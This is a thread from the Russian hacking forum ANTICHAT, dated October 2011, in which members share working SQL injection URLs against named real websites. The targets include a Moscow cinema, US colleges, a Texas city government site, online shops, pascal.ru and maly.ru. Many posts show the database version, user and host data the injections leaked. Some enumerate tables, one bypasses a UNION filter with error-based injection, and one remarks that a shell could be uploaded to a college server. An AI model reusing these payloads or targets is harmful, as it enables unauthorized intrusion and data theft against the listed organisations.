ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.10.2011, 21:02
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Московский кинотеатр.
http://www.5zvezd.ru/news/2011/10/20/930+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,1 2,concat_ws%280x3a,version%28%29,database%28%29,us er%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25+--+/
|
|
|
23.10.2011, 14:02
|
|
Новичок
Регистрация: 11.09.2011
Сообщений: 9
Провел на форуме:
2593
Репутация:
2
|
|
Target: http://www.hbswany.org/images.html?view_album=20
Host IP: 207.171.1.101
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 769 ms
Current User: webuser1@localhost
Sql Version: 5.0.82sp1
Current DB: hbswany_org
System User: webuser1@localhost
Host Name: jaws02.omnimagnet.com
Installation dir: /usr/
DB User: 'webuser1'@'%'
|
|
|
|
24.10.2011, 10:45
|
|
Новичок
Регистрация: 30.08.2011
Сообщений: 10
Провел на форуме:
2900
Репутация:
0
|
|
Код:
http://secure.ws-montessori.com/produkt/produkt.php?show=-6/**/union/**/select/**/1,2,3,version(),5,6,7,8,9,10--
У кого есть словарь немецких таблиц может попробовать просканить А так.. mysql 4
DB: montessorien |
|
|
|
24.10.2011, 13:11
|
|
Новичок
Регистрация: 18.08.2010
Сообщений: 10
Провел на форуме:
3951
Репутация:
0
|
|
Код:
http://www.sleepmonsters.us/news.php?article_id=-4315+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7,8,9,10,11,12,13--+
5.0.77-log:503342_SleepMonsters:503342_SM_user@172.17.35. 64 |
|
|
|
24.10.2011, 18:36
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
Код:
http://www.iceandwine.com/product-list.php?cid=-13+union+select+version%28%29--
|
|
|
|
24.10.2011, 21:29
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Код:
http://www.morehate.com/ru/press.php?id=49+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29--
morehat1_karalez@localhost:morehat1_morehateru:5.0 .92-log
Код:
http://www.morehate.com/ru/press.php?id=49+union+select+1,2,table_name+from+INFORMATION_SCHEMA.TABLES--
|
|
|
|
25.10.2011, 08:46
|
|
Новичок
Регистрация: 18.08.2010
Сообщений: 10
Провел на форуме:
3951
Репутация:
0
|
|
Код:
http://kuzshop.ru/?p=28&c=-72+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5--+
5.1.58-log:wwwkuzshopru_evrik:kuzshop@fe107.hc.ru
Код:
http://www.towncrier.us/crierdetail.php?smenu=1&twindow=&sdetail=17860&mad=&wpage=1&skeyword=&sidate=&recID=-1237+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7--+
4.0.18-standard:town_crier:milford_crier@localhost
Код:
http://www.sunnet.us/view_news.php?nid=70+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5--+
5.0.45-community-nt:sn_db:sn_usr@localhost
Код:
http://www.ci.mesquite.tx.us/pressrelease/Press_release.php?IDkey=-187+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--+
4.0.24-nt:news:news@www.cityofmesquite.com
Код:
http://womenofthestorm.us/news_subdet.php?wots_subcontent_ID=-133+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--+
5.1.52-log:wos:wos_user@localhost |
|
|
|
25.10.2011, 16:24
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
зачем еду удалили?
http://www.lakeerie.edu/news.php?id=0%20union%20select%201,2,version(),4,5 ,6,7,8
http://www.spcc.edu/news.php?id=0%20union%20select%201,2,version(),4,5 ,6,7,8,9,10
http://archive.parsons.edu/view.php?pid=68%20and%20database()='dt_archive'
http://www.mcs.sdsmt.edu/view.php?p=0%20union%20select%201,version(),3,4,5, 6
(в последнюю можно без проблем залить шелл )
|
|
|
|
25.10.2011, 21:19
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
тиЦ 400 PR 3
Код:
http://www.pascal.ru/index.php?id=9999999+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+--+
pascal.ru@localhost: pascal:5.0.24a-log
Код:
http://www.pascal.ru/index.php?id=9999999+union+select+table_name+from+information_schema.tables--
|
|
|
|
26.10.2011, 18:07
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Maly.ru Тиц1000 PR6
Код:
http://maly.ru/people.php?name=ZharovM%27+order+by+10++--+
ололо, "hack attempt detected", автор видимо не вкурсе о group by.
Код:
http://maly.ru/people.php?name=ZharovM%27+group+by+11++--+
Впрочем стоит фильтр на UniOn SelEct, не стал париться, ошибка выводится, и этого достаточно.
Код:
http://maly.ru/people.php?name=1%27+and%28select+1+from%28select+count%28*%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Линейный вид
